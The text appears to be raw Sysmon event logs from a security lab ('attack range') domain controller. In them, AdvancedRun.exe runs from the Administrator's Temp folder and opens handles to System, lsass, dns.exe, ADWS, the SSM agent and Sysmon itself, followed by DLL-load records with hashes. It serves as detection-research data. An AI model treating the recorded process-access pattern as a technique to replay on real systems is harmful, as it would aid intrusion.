18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004015386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004015381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating 
SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004015371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015369Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015368Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 
(rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015367Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015365Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004015364Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015363Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015362Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015361Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015359Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015356Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 